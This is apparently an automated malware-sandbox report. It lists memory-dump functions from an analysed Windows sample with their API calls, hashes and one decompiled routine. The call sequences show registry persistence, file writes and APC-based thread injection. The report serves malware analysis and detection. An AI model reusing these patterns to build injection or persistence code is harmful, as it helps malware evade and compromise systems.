                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                            • String ID: W
                                                            • API String ID: 630447368-655174618
                                                            • Opcode ID: 658b5a693c7b197dbbe1103244de80970761efc6b6753f6319c6acd8d239ee06
                                                            • Instruction ID: 46f5833344af4d9915c2abec69671e9efc8c48cca1f0640358816e74dc3ed8b3
                                                            • Opcode Fuzzy Hash: 658b5a693c7b197dbbe1103244de80970761efc6b6753f6319c6acd8d239ee06
                                                            • Instruction Fuzzy Hash: E9415A7590111AFBEB119FA1EC88DAE7FB9FF48344F104429F905A6210DB34BA54EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04582A6F
                                                              • Part of subcall function 0457B801: RegCloseKey.ADVAPI32(?,04566C27), ref: 0457B888
                                                            • RegOpenKeyA.ADVAPI32(80000001,04566C27,?), ref: 04582AAA
                                                            • lstrcpyW.KERNEL32(-00000002,B70FF003), ref: 04582B0B
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04582B20
                                                            • lstrcpyW.KERNEL32(?), ref: 04582B3A
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04582B49
                                                              • Part of subcall function 04571573: lstrlenW.KERNEL32(00000000,00000000,?,04582B68,00000000,?,?,?,04566C27), ref: 04571586
                                                              • Part of subcall function 04571573: lstrlen.KERNEL32(04582B68,?,04582B68,00000000,?,?,?,04566C27), ref: 04571591
                                                              • Part of subcall function 04571573: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 045715A6
                                                            • RegCloseKey.ADVAPI32(04566C27,?,04566C27,00000000,?,?,?,04566C27), ref: 04582BB3
                                                              • Part of subcall function 0456A20E: lstrlenW.KERNEL32(?,?,00000000,73B74D40,?,?,04581C44,?,73B74D40), ref: 0456A21A
                                                              • Part of subcall function 0456A20E: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04581C44,?,73B74D40), ref: 0456A242
                                                              • Part of subcall function 0456A20E: memset.NTDLL ref: 0456A254
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,04566C27), ref: 04582BE8
                                                            • GetLastError.KERNEL32(?,?,04566C27), ref: 04582BF3
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04566C27), ref: 04582C09
                                                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,04566C27), ref: 04582C1B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1430934453-0
                                                            • Opcode ID: 98436f5ff2e1a59b4a4faa9e292150ea3d6cc4445bd27265db1cccba2dad71f7
                                                            • Instruction ID: 9d5e65f782ed7acf31418b7d8501398e5488f8a51cbf55fd33f8e79a3ee28644
                                                            • Opcode Fuzzy Hash: 98436f5ff2e1a59b4a4faa9e292150ea3d6cc4445bd27265db1cccba2dad71f7
                                                            • Instruction Fuzzy Hash: DF51297190110AEBEB11AFA0DC44EAE7BB8FB84315F1045A9F901F3250DF39EE05AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0456BCE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0456BCF7
                                                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 0456BD1F
                                                            • HeapFree.KERNEL32(00000000,00000001), ref: 0456BD60
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456BD70
                                                            • RtlAllocateHeap.NTDLL(00000000,04566562), ref: 0456BD83
                                                            • RtlAllocateHeap.NTDLL(00000000,04566562), ref: 0456BD92
                                                            • HeapFree.KERNEL32(00000000,?,?,04566562,?,00000001,?,?), ref: 0456BDDC
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,04566562,?,00000001), ref: 0456BE00
                                                            • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,04566562,?,00000001), ref: 0456BE25
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,04566562,?,00000001), ref: 0456BE3A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CloseCreate
                                                            • String ID:
                                                            • API String ID: 4126010716-0
                                                            • Opcode ID: 7833fe18b5d937c8297f6d4db498d8f62b498ab3a15b9657869b35168112fc5c
                                                            • Instruction ID: c0804aa7cf4ae9def0490188356fde921c61a35200a3b0b5784f44b5621efbd1
                                                            • Opcode Fuzzy Hash: 7833fe18b5d937c8297f6d4db498d8f62b498ab3a15b9657869b35168112fc5c
                                                            • Instruction Fuzzy Hash: 7851C2B580011AEFDF119F95E8809EEBBB9FB08344F10446AF615B6211DB35AE94EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 0457344A
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04573460
                                                            • lstrlenW.KERNEL32(00000000), ref: 045734A3
                                                            • RtlAllocateHeap.NTDLL(00000000,04584AA2), ref: 045734B9
                                                            • memcpy.NTDLL(00000000,00000000,04584AA0), ref: 045734CC
                                                            • _wcsupr.NTDLL ref: 045734D7
                                                            • lstrlenW.KERNEL32(?,04584AA0), ref: 04573510
                                                            • RtlAllocateHeap.NTDLL(00000000,?,04584AA0), ref: 04573525
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0457353B
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04573560
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457356F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 3868788785-0
                                                            • Opcode ID: 4eb0eed57cdc2930f19677b3ad573d85781c35cdfd5a444edfe50fde29c51a4d
                                                            • Instruction ID: 57b728a35d2354eeef984fe0976c60e91274d478aeb23ca10ead3ab951a6606f
                                                            • Opcode Fuzzy Hash: 4eb0eed57cdc2930f19677b3ad573d85781c35cdfd5a444edfe50fde29c51a4d
                                                            • Instruction Fuzzy Hash: 0E31BD32500205EBC7215FA8BC8896F7BA9FB85720B15463DF911E2181DF79BC48FB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E00DD3D9E(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				long _v16;
                                                            				WCHAR* _v20;
                                                            				signed int _v24;
                                                            				void* __esi;
                                                            				long _t43;
                                                            				intOrPtr _t44;
                                                            				intOrPtr _t46;
                                                            				void* _t48;
                                                            				void* _t49;
                                                            				void* _t50;
                                                            				WCHAR* _t54;
                                                            				intOrPtr _t57;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				void* _t60;
                                                            				intOrPtr _t66;
                                                            				void* _t71;
                                                            				void* _t74;
                                                            				intOrPtr _t75;
                                                            				void* _t77;
                                                            				intOrPtr _t79;
                                                            				intOrPtr* _t80;
                                                            				WCHAR* _t91;
                                                            
                                                            				_t79 =  *0xdda38c; // 0x39c9c08
                                                            				_v24 = 8;
                                                            				_t43 = GetTickCount();
                                                            				_push(5);
                                                            				_t74 = 0xa;
                                                            				_v16 = _t43;
                                                            				_t44 = E00DD6AF5(_t74,  &_v16);
                                                            				_v8 = _t44;
                                                            				if(_t44 == 0) {
                                                            					_v8 = 0xdd91ac;
                                                            				}
                                                            				_t46 = E00DD5D9A(_t79);
                                                            				_v12 = _t46;
                                                            				if(_t46 != 0) {
                                                            					_t80 = __imp__;
                                                            					_t48 =  *_t80(_v8, _t71);
                                                            					_t49 =  *_t80(_v12);
                                                            					_t50 =  *_t80(_a4);
                                                            					_t54 = E00DD77D7(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                            					_v20 = _t54;
                                                            					if(_t54 != 0) {
                                                            						_t75 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t16 = _t75 + 0xddbab8; // 0x530025
                                                            						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                            						_push(4);
                                                            						_t77 = 5;
                                                            						_t57 = E00DD6AF5(_t77,  &_v16);
                                                            						_v8 = _t57;
                                                            						if(_t57 == 0) {
                                                            							_v8 = 0xdd91b0;
                                                            						}
                                                            						_t58 =  *_t80(_v8);
                                                            						_t59 =  *_t80(_v12);
                                                            						_t60 =  *_t80(_a4);
                                                            						_t91 = E00DD77D7(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                            						if(_t91 == 0) {
                                                            							E00DD77EC(_v20);
                                                            						} else {
                                                            							_t66 =  *0xdda2d4; // 0x2bed5a8
                                                            							_t31 = _t66 + 0xddbbd8; // 0x73006d
                                                            							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                            							 *_a16 = _v20;
                                                            							_v24 = _v24 & 0x00000000;
                                                            							 *_a20 = _t91;
                                                            						}
                                                            					}
                                                            					E00DD77EC(_v12);
                                                            				}
                                                            				return _v24;
                                                            			}

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00DD3DB3
                                                            • lstrlen.KERNEL32(?,80000002,00000005), ref: 00DD3DF3
                                                            • lstrlen.KERNEL32(00000000), ref: 00DD3DFC
                                                            • lstrlen.KERNEL32(00000000), ref: 00DD3E03
                                                            • lstrlenW.KERNEL32(80000002), ref: 00DD3E10
                                                            • wsprintfW.USER32 ref: 00DD3E49
                                                            • lstrlen.KERNEL32(?,00000004), ref: 00DD3E70
                                                            • lstrlen.KERNEL32(?), ref: 00DD3E79
                                                            • lstrlen.KERNEL32(?), ref: 00DD3E80
                                                            • lstrlenW.KERNEL32(?), ref: 00DD3E87
                                                            • wsprintfW.USER32 ref: 00DD3EBA
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                            • String ID:
                                                            • API String ID: 822878831-0
                                                            • Opcode ID: 063ac661433d3a0db4bd04c384377e8cbc41035b3b88452a8c8055a541a84f3b
                                                            • Instruction ID: 7f574c540627922d6fd5f870b64e893e4947f16d33f20a11637a7dba5a5d9284
                                                            • Opcode Fuzzy Hash: 063ac661433d3a0db4bd04c384377e8cbc41035b3b88452a8c8055a541a84f3b
                                                            • Instruction Fuzzy Hash: 9B414972900219FBCF11AFA8DD09A9EBBB5EF48314F054092FD04A7361D7369A15EBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,00000001), ref: 045812BB
                                                              • Part of subcall function 0457B801: RegCloseKey.ADVAPI32(?,04566C27), ref: 0457B888
                                                            • lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,04566C27), ref: 045812EA
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04566C27), ref: 045812FB
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04581335
                                                            • RegSetValueExA.ADVAPI32(00000004,?,00000000,00000004,?,00000004,?,?,04566C27), ref: 04581357
                                                            • RegCloseKey.ADVAPI32(?,?,?,04566C27), ref: 04581360
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04581376
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04566C27), ref: 0458138B
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0458139F
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04566C27), ref: 045813B4
                                                            • RegCloseKey.ADVAPI32(?,?,?,04566C27), ref: 045813BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                                            • String ID:
                                                            • API String ID: 534682438-0
                                                            • Opcode ID: 51034bdcb76ceee0605aa81751a80f1e7b1a1a82cf770c2992a3caea96fe2b9f
                                                            • Instruction ID: b4546aaf90d207d84888b6de3bf99486e3270e2f1febcc8b4515eabbe4be7590
                                                            • Opcode Fuzzy Hash: 51034bdcb76ceee0605aa81751a80f1e7b1a1a82cf770c2992a3caea96fe2b9f
                                                            • Instruction Fuzzy Hash: CA313771900508EFDB12AFA4EC88CAE7BB9FB49301B104159F546F2121DF39AE49FB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04566B27
                                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 04566B39
                                                            • StrChrA.SHLWAPI(00000000,0000003A,?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 04566B46
                                                            • wsprintfA.USER32 ref: 04566B61
                                                            • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000094), ref: 04566B77
                                                            • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 04566B90
                                                            • WriteFile.KERNEL32(00000000,00000000), ref: 04566B98
                                                            • GetLastError.KERNEL32 ref: 04566BA6
                                                            • CloseHandle.KERNEL32(00000000), ref: 04566BAF
                                                            • GetLastError.KERNEL32(?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?,00000094), ref: 04566BC0
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04561FC8,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 04566BD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                                            • String ID:
                                                            • API String ID: 3873609385-0
                                                            • Opcode ID: 1c95b17e2d8ff05b841e28ae6432d0a3439d3f86a8e76e479d91dcec70dc1b26
                                                            • Instruction ID: 8aa48f99c775f895a55a1cd032e4da0aaa4d6f3643518a5d9d1e7cb03f055744
                                                            • Opcode Fuzzy Hash: 1c95b17e2d8ff05b841e28ae6432d0a3439d3f86a8e76e479d91dcec70dc1b26
                                                            • Instruction Fuzzy Hash: 9011A271201214FFD3216B25AC8CF7B3B6CFB413A5F001129F906E6180EE296D09F6B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04575551
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04575570
                                                              • Part of subcall function 0456B7B9: wsprintfA.USER32 ref: 0456B7CC
                                                              • Part of subcall function 0456B7B9: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0456B7DE
                                                              • Part of subcall function 0456B7B9: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0456B808
                                                              • Part of subcall function 0456B7B9: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0456B81B
                                                              • Part of subcall function 0456B7B9: CloseHandle.KERNEL32(?), ref: 0456B824
                                                            • GetLastError.KERNEL32 ref: 04575843
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04575853
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04575864
                                                            • RtlExitUserThread.NTDLL(?), ref: 04575872
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                                            • String ID:
                                                            • API String ID: 1258333524-0
                                                            • Opcode ID: 665afd8cbad7946f41b54d04876d92e04fa094bb375a434a10351f5706090ede
                                                            • Instruction ID: efde9851e78d033f32076ace2183949bcf34b50a231d4deb7e38186fcdab9fd7
                                                            • Opcode Fuzzy Hash: 665afd8cbad7946f41b54d04876d92e04fa094bb375a434a10351f5706090ede
                                                            • Instruction Fuzzy Hash: F6B14AB1500209EFEB209F21EC84AAA7BB9FF08345F204539FA1AD6551FB34E845EF11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(049BBA30,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04581DB6
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04581DC5
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04581DD2
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04581DEA
                                                            • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04581DF6
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04581E12
                                                            • wsprintfA.USER32 ref: 04581EF4
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04581F41
                                                            • InterlockedExchange.KERNEL32(0458C0BC,00000000), ref: 04581F5F
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04581FA0
                                                              • Part of subcall function 045624CF: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 045624F8
                                                              • Part of subcall function 045624CF: memcpy.NTDLL(00000000,?,?), ref: 0456250B
                                                              • Part of subcall function 045624CF: RtlEnterCriticalSection.NTDLL(0458C328), ref: 0456251C
                                                              • Part of subcall function 045624CF: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04562531
                                                              • Part of subcall function 045624CF: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04562569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                            • String ID:
                                                            • API String ID: 4198405257-0
                                                            • Opcode ID: 3881687c5740a8ea375691a0c3a49918dc15a2d0425c87099d7d058de182462e
                                                            • Instruction ID: b39bee1d21a9a9cba15e02a369a456fc3f72f43a7e49c43ab3a6718af55764f8
                                                            • Opcode Fuzzy Hash: 3881687c5740a8ea375691a0c3a49918dc15a2d0425c87099d7d058de182462e
                                                            • Instruction Fuzzy Hash: 2E616D71A0020AEFCB11DFA5D884EAE3BB9FB44344F04456DF905B7250DF78A949EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045687FC: memset.NTDLL ref: 0456881E
                                                              • Part of subcall function 045687FC: CloseHandle.KERNEL32(?,?,?,?,?), ref: 045688C8
                                                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 04579B19
                                                            • CloseHandle.KERNEL32(?), ref: 04579B25
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04579B35
                                                            • lstrlenW.KERNEL32(00000000), ref: 04579B3F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04579B50
                                                            • wcstombs.NTDLL ref: 04579B61
                                                            • lstrlen.KERNEL32(?), ref: 04579B6E
                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 04579BA4
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04579BB6
                                                            • DeleteFileW.KERNEL32(?), ref: 04579BC4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                                            • String ID:
                                                            • API String ID: 2256351002-0
                                                            • Opcode ID: 3c163a6687c026efd4f454fa04b27fa672980d2ef18195edd66bfa454796b3b3
                                                            • Instruction ID: 13dd7116c2f9eaabd335ebab4851c1b4d4afc09891e81ff39d3ac1bab20c91ec
                                                            • Opcode Fuzzy Hash: 3c163a6687c026efd4f454fa04b27fa672980d2ef18195edd66bfa454796b3b3
                                                            • Instruction Fuzzy Hash: 19313A7180011AEFDF11AFA5E988CAE7F79FF45305F004069F905B2151DB39AE55EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 0456DD70
                                                            • CreateFileW.KERNEL32(04561DEA,80000000,00000003,0458C1A8,00000003,00000000,00000000,?,04561DEA,?), ref: 0456DD8D
                                                            • GetLastError.KERNEL32(?,04561DEA,?), ref: 0456DE35
                                                              • Part of subcall function 0456AB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 0456ABBE
                                                              • Part of subcall function 0456AB88: lstrcpy.KERNEL32(00000000,00000000), ref: 0456ABE2
                                                              • Part of subcall function 0456AB88: lstrcat.KERNEL32(00000000,00000000), ref: 0456ABEA
                                                            • GetFileSize.KERNEL32(04561DEA,00000000,?,00000001,?,04561DEA,?), ref: 0456DDC0
                                                            • CreateFileMappingA.KERNEL32(04561DEA,0458C1A8,00000002,00000000,00000000,04561DEA), ref: 0456DDD4
                                                            • lstrlen.KERNEL32(04561DEA,?,04561DEA,?), ref: 0456DDF0
                                                            • lstrcpy.KERNEL32(?,04561DEA), ref: 0456DE00
                                                            • GetLastError.KERNEL32(?,04561DEA,?), ref: 0456DE08
                                                            • HeapFree.KERNEL32(00000000,04561DEA,?,04561DEA,?), ref: 0456DE1B
                                                            • CloseHandle.KERNEL32(04561DEA,?,00000001,?,04561DEA), ref: 0456DE2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                            • String ID:
                                                            • API String ID: 194907169-0
                                                            • Opcode ID: 59f5bb6f10fdfdfc526f23a8d058f12e9fa8dd28cdf433a6b4d802ed004fbddb
                                                            • Instruction ID: cf8a0f4f952d4d9718a754efd65357fba4bb4fcc847f130cfe3b9fa460f7bb0e
                                                            • Opcode Fuzzy Hash: 59f5bb6f10fdfdfc526f23a8d058f12e9fa8dd28cdf433a6b4d802ed004fbddb
                                                            • Instruction Fuzzy Hash: C921FC71900208FFDB119FA5D888A9EBFB9FB04355F108469F506E6250DB759E48EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,0456824E,?,00000001), ref: 0457AE8B
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0457AE97
                                                            • GetModuleHandleA.KERNEL32(?,049B9732,?,00000000,00000000), ref: 0457AEB7
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0457AEBE
                                                            • Thread32First.KERNEL32(00000001,0000001C), ref: 0457AECE
                                                            • OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 0457AEE9
                                                            • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 0457AEFA
                                                            • CloseHandle.KERNEL32(00000000), ref: 0457AF01
                                                            • Thread32Next.KERNEL32(00000001,0000001C), ref: 0457AF0A
                                                            • CloseHandle.KERNEL32(00000001), ref: 0457AF16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                            • String ID:
                                                            • API String ID: 2341152533-0
                                                            • Opcode ID: dc875a0f29311dc3c0d666eda68321579a212fcfbfe14a4513526837620cc4b2
                                                            • Instruction ID: 84e2a05b1084d261c9f59d95da10ba875c2fe40f233a0c42ca3cd59515de1784
                                                            • Opcode Fuzzy Hash: dc875a0f29311dc3c0d666eda68321579a212fcfbfe14a4513526837620cc4b2
                                                            • Instruction Fuzzy Hash: 05213DB2900119EFDF01AFA0EC88DAE7B79FB48355B00412AFA01B7150DB35AD45ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetEvent.KERNEL32(?,?,0456E0E1), ref: 045742C9
                                                              • Part of subcall function 045670E1: InterlockedExchange.KERNEL32(?,000000FF), ref: 045670E8
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0456E0E1), ref: 045742E9
                                                            • CloseHandle.KERNEL32(00000000,?,0456E0E1), ref: 045742F2
                                                            • CloseHandle.KERNEL32(?,?,?,0456E0E1), ref: 045742FC
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04574304
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0457431C
                                                            • Sleep.KERNEL32(000001F4), ref: 0457432B
                                                            • CloseHandle.KERNEL32(?), ref: 04574338
                                                            • LocalFree.KERNEL32(?), ref: 04574343
                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 0457434D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                            • String ID:
                                                            • API String ID: 1408595562-0
                                                            • Opcode ID: b9007a084d4c8147ec915ab7050f8603cc6249577cb4cbb806a5421c258d31a4
                                                            • Instruction ID: b47aa9b5298d9110b0fc479634d6600896075defa884295e3a05989ab64bf6bb
                                                            • Opcode Fuzzy Hash: b9007a084d4c8147ec915ab7050f8603cc6249577cb4cbb806a5421c258d31a4
                                                            • Instruction Fuzzy Hash: CC114C75200616EFDB206B75F848A5AB7B8FF057157541928E196A3510CF3AF884AB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 045691EE
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 045692A6
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0456923C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04569255
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04569274
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 04569286
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0456928E
                                                            Strings
                                                            • Software\Microsoft\WAB\DLLPath, xrefs: 045691DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                            • String ID: Software\Microsoft\WAB\DLLPath
                                                            • API String ID: 1628847533-3156921957
                                                            • Opcode ID: 9b40639c099986215c090c65e090d230a1440a151dc8daf518ad89b5e5701648
                                                            • Instruction ID: 5e41f205d6dcfa7381697254840e75655fe11637222e48bbd862b8a6cfe9e7bf
                                                            • Opcode Fuzzy Hash: 9b40639c099986215c090c65e090d230a1440a151dc8daf518ad89b5e5701648
                                                            • Instruction Fuzzy Hash: E2218676900115FFCB21ABA5EC88CAEBBBCFB84751B100155F802B7115EA356E44FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
